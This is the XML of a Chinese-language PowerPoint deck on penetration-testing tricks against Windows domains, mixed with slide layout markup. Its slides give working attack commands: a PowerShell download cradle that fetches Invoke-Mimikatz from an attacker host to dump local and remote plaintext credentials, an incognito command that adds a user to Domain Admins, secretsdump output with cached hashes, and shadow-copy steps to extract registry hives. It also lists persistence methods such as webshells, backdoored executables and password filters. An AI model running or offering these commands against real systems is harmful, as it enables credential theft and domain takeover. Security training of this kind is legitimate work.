          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6469888" y="2499360"/>
            <a:ext cx="4883912" cy="2609088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="18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dirty="0" smtClean="0"/>
              <a:t>单击此处编辑母版文本样式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="836347" y="5884976"/>
            <a:ext cx="4936253" cy="174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日期占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4B68B81A-64DD-455E-AC40-261B0A63D2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90F8D7-809F-407E-9E77-E5A7269283F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89" y="378377"/>
            <a:ext cx="1182511" cy="5717623"/>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838200" y="378377"/>
            <a:ext cx="9126728" cy="5717623"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2400"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="527050" indent="-257175">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl2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10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4B68B81A-64DD-455E-AC40-261B0A63D2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90F8D7-809F-407E-9E77-E5A7269283F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矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="343434"/>
          </a:solidFill>
          <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="685800" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="135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3" name="KSO_BC1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1133476"/>
            <a:ext cx="10515600" cy="510014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a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="KSO_BT1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="213920"/>
            <a:ext cx="10515600" cy="79601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8B81A-64DD-455E-AC40-261B0A63D26F}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>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0F8D7-809F-407E-9E77-E5A7269283F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514350" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="2800" b="1" i="0" kern="1200" baseline="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:effectLst/>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="271780" indent="-271780" algn="just" defTabSz="514350" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="110000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="900"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="FFE89F"/>
        </a:buClr>
        <a:buSzPct val="100000"/>
        <a:buFontTx/>
        <a:buBlip>
          <a:blip r:embed="rId11"/>
        </a:buBlip>
        <a:defRPr lang="zh-CN" altLang="en-US" sz="2400" b="0" kern="1200" baseline="0" dirty="0" smtClean="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="269875" indent="135255" algn="just" defTabSz="514350" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPts val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="tx1"/>
        </a:buClr>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2000" b="0" kern="1200" baseline="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800"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800"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800"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image" Target="../media/image2.jpeg"/><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ctrTitle"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>渗透测试中的技巧</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6148" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5768945" y="4515051"/>
            <a:ext cx="5630400" cy="608400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Mickey</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1" descr="weixin1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8007985" y="2766695"/>
            <a:ext cx="2731135" cy="2731135"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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明文密码抓取</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>本地明文密码抓取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>nohup python -m SimpleHTTPServer 8888&amp; 		</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.4/Invoke-Mimikatz.ps1');  Invoke-Mimikatz –DumpCerts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:t>远程主机明文密码抓取</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t>如果开启了Powershell Remoting（类似WinRM，开放47001 端口) Dump 远程机器的密码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t>powershell “IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.4/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds -ComputerName @(‘computer1′, ‘computer2′)”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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>本地</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>administrator</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>帐户通杀 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Incognito </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:t>列举所</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>hosts.txt</a:t>
            </a:r>
            <a:r>
              <a:t>里主机所有的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>token,</a:t>
            </a:r>
            <a:r>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>pentest</a:t>
            </a:r>
            <a:r>
              <a:t>用户加入到域管理员组</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>D:\&gt;incognito.exe -f hosts.txt -u administrator -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>corp1234 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>-n 20 add_group_user -h dc1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>corp.target.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>  "Domain Admins" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>pentest</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DomainCache</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的破解</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="97500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>没法用于pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>	 </a:t>
            </a:r>
            <a:r>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:t>ash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>抓取工具</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>	https://github.com/coresecurity/impacket</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>	$secretsdump.py -sam sam.save -security security.save -system system.save LOCAL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>	[*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>	hdes:6ec74661650377df488415415bf10321:target.corp.com:TARGET:::</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>	Administrator:c4a850e0fee5af324a57fd2eeb8dbd24:target.CORP.COM:TARGET:::</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>破解时注意格式问题</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>mscash (xp, w2k3) </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>mscash2 (vista, w7, w2k8 …)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:t>支持破解的工具</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t>      彩虹表： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Cain</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>      GPU</a:t>
            </a:r>
            <a:r>
              <a:t>　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HashCat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>管理员配置错误</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如果计算机帐号在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>”Domain Admins” </a:t>
            </a:r>
            <a:r>
              <a:t>或者 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>“AD Backups” </a:t>
            </a:r>
            <a:r>
              <a:t>组里</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>那么登陆到该计算机的管理用户是不是能获取到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>”Domain admins” </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>组的权限？</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"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维持域权限</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>金钥匙  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>drops.wooyun.org/tips/9591]</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>dump</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>所有域</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>HASH [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>gsecdump </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>v2b5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>卷影副本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>边界服务器留 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>文件服务器用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>BDF</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>插</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>evilpassfilter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>盯住管理员邮箱和聊天软件</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>VPN</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>入口</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dump</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>所有域</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HASH [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>gsecdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> v2b5/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>卷影副本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>C:\&gt;cscript vssown.vbs /list</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>C:\&gt;cscript vssown.vbs /status</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>C:\&gt;cscript vssown.vbs /mode</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>C:\&gt;cscript vssown.vbs /create</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>C:\&gt;copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM .</a:t>
